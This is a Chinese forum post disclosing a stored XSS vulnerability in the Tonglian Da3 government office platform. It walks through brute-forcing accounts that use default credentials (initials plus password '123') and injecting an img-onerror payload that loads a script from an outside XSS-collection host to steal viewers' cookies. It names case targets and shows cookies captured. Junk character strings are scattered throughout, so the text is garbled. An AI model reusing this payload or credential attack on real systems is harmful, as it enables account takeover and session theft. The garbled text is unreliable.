# @7 @- ?+ N4 U& }
0 e, _& D* v! b0 j3 Q 同联Da3协同办公平台后台通用储存型xss漏洞
% }- a; {5 W ^/ y1 h* G i
/ S1 S/ P; D' o# k- U 3 U1 P: e. n* s M* O; n% ^. v& ~
平台简介:! a' w8 L% h4 M5 Q) T1 c
# @; m# X0 A# _ E6 O4 V/ a
. n4 T: ^* }4 w' f i ( X! `1 X* T* x8 i" J
( u G$ N% V2 @4 V
$ P% x! P% F4 {& T 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
7 O0 ]5 q( ~4 }7 ]8 G& \
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
0 z9 ^) a. \7 J" w& @. |
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!0 g5 W1 w: `8 _3 w, p* W `, Q
6 Q: m1 u" ^9 r3 l
, b. \1 {" W& r: N0 n6 m7 o3 z 1 A/ p2 Q7 ]: Y9 `1 s$ I
2 q( y" r& D' Q+ v/ _, F* R, J
Z x9 W: V9 \ 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:! r% C' b) j" p& Q
6 R- J, p! |4 e% f/ |4 o* A' U& D
! k; C1 o: _8 ]4 I9 g
" H: v; c# T2 n$ L
2 K" z# _$ ?0 @) A$ d2 N; P4 l $ h6 D8 g/ S5 g. r# @# c: [- n
http://1.1.1.1:7197/cap-aco/#(案例2-)3 v# R: c" S5 ]% j4 y( ^7 t
5 h* C6 g4 `7 U. l0 ~
6 w6 s( t3 ]) U& x http://www.XXOO.com (案例1-官网网站)4 T# v3 e0 k* P9 }' { q( R
$ C9 E& p" t8 k& Q
0 j, \$ i; m) T/ z4 b/ B 漏洞详情:# N6 Y9 }5 U' {# l& C0 r
M3 L; y" F8 N; Z/ G, _
9 z; P" Y7 Y! o2 |2 f) q 案例一、
% y/ d9 L }; _5 E: ^$ A) U* U
4 {1 s8 [ a* u! d9 s: H* r' }
7 ]- u$ t. e9 I: T% t' W& `5 S
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试4 t# Z) ^6 {, A2 n# v
; S1 G! g; a. d: ^ # G, l" ]3 G, l# s* ^$ u1 N
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
' a; i7 f& [3 x0 g" w/ i( }- Z/ {
* p9 a* l3 E% j S5 S( }8 o
. k9 ~, e9 G2 o( D# k7 B0 L# G8 Q# X$ ] ! {. ~% @6 J- T+ t% i: h
, v7 c7 v3 n/ w: h, j9 p # \8 Q' A+ g8 n) C4 p
( Z- b% q8 n- s b* t! @, G
& H* c7 A: }9 Z) k
s0 r5 K( I" o$ g; C5 K8 v
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: 8 |/ F9 G0 T- `( v9 P! ]" S$ n
- U- t \- Y' ~# a1 l; `
) N4 S; I1 Z& ^5 T
' N: m6 \* z" K! o( ^6 ? l0 k
0 }6 u& C$ X5 ^. z& Q
& D% a' z, b$ s
& a- l8 P# e9 k$ ?/ b
8 k: r R4 N2 @
4 E+ d/ D% N/ J9 S% [& T. \ 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
6 f: ], R2 S' @# ]+ T& R
, z$ x' u2 R- d# c- }+ e
& a8 `1 |8 i, |0 Y# [ 9 z! y6 A0 Q+ u' a6 ~( i
. E$ I4 {% \$ v6 v* k- G
! y: T, g% D" E; ^, f$ G
<img src=x4 T1 y% |- G$ O
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: ( N3 U' B- A- d
* ?- m: N& G5 K+ c; B$ g" x6 m: R & ]7 k' r! Z3 _+ N0 k
/ w3 w6 S: P$ l0 J P* a$ w
/ C& m$ l4 j' Y$ ?# l; \5 c, K; F! y
9 @3 D1 X" P- K& r; u
然后发送,接收cookie如图: & J% g/ ^+ p7 f4 P9 L) c; ?' b
9 M9 S& a% h2 V9 E; L, V
7 a8 N' r" Z3 t4 h, a/ x6 Y! t7 F
& X- y5 y, A9 M6 J; O7 u
$ Y9 H; r. T2 f4 ^; g# y4 J
3 P7 D( U! B& B
. m& |: R, W8 C" |
/ ]. M h# S+ h8 A1 e- E' q: l
$ M- n1 C0 [# q+ w" b, G7 ]
3 T' F) ~' v' [5 s
+ t- i. t- [4 T3 e8 F, V6 ^# I
) h% H3 E2 T9 m- Q $ y, H# i0 C q' a/ r$ \6 e. d
4 c) ~3 t, u. q6 @' L7 e 4 v$ u" g! J0 j4 S9 L) R8 C# d
* e+ U' M! ?* N
_" j3 s+ j- b# x5 y* q9 E: x6 Z- C5 v
3 O' b/ C ? X# u- Q 
) v' e8 k% [5 k" E2 C+ M! P
& [4 ^8 Y# K/ K, W
* } _5 k& F. B6 \ ; {* I4 w: `# g4 L+ b
6 {: H7 s( m0 W: x5 z+ D
" w# s N, {3 m5 p) a( V+ n 案例2、 & E2 u+ M3 R/ Z2 A
% U" U! N3 L! M% }
/ ~2 o+ K4 Q( r6 U4 `1 v: Y- E 前面步骤都一样,下面看效果图:
! ^8 D' ?1 f" _+ E* B% Y6 X
K9 Y! `$ W' k8 g0 S# Q4 t3 [' k . C' q# k3 ?6 B; M
$ g, m' t/ B) t
5 W' }, X* r2 z" `% l" N
& A: P1 `! f! }4 [- D 
0 s8 o4 y8 l) u3 u9 q1 d9 l+ ?
; O$ P; H2 t$ P2 t
* l+ r( Z; |# q
/ P+ f: H; \7 G' w5 f: A/ m! O
% O, R+ V' d! a! I
/ I# Y( T8 s4 ?$ K9 G - A% t* Z u/ M
0 P% C' y# ?1 Z6 Z
1 j& s7 `8 V9 u/ y$ H& J. @' J 
/ n' c- {) W4 Q: ~& D( S9 P. y5 [
6 E( y) o# D: K1 {3 [! k : n1 `" u V# k9 Y+ q P
" {- z6 m% [0 c0 `! ] v8 P% ?
% P; d5 r, o0 b1 n! ]7 o
5 P% M9 q3 I8 N5 P 2 `) H" O! L' t6 c# K* ~( u
* x- F6 s% l& F7 S5 d
2 T, O1 N, b0 i& W + E' N- G& C5 ~! A, j; ?+ P
* J+ z$ S7 a7 c" u% \0 Q2 T 5 ?, [( f3 A3 J7 X2 ^. b& a
. }4 d k* R, h- P9 T& S
9 i7 o4 T! K5 L% X3 U& y$ T& V 
发表于 2018-10-20 20:14:15
收藏
支持
反对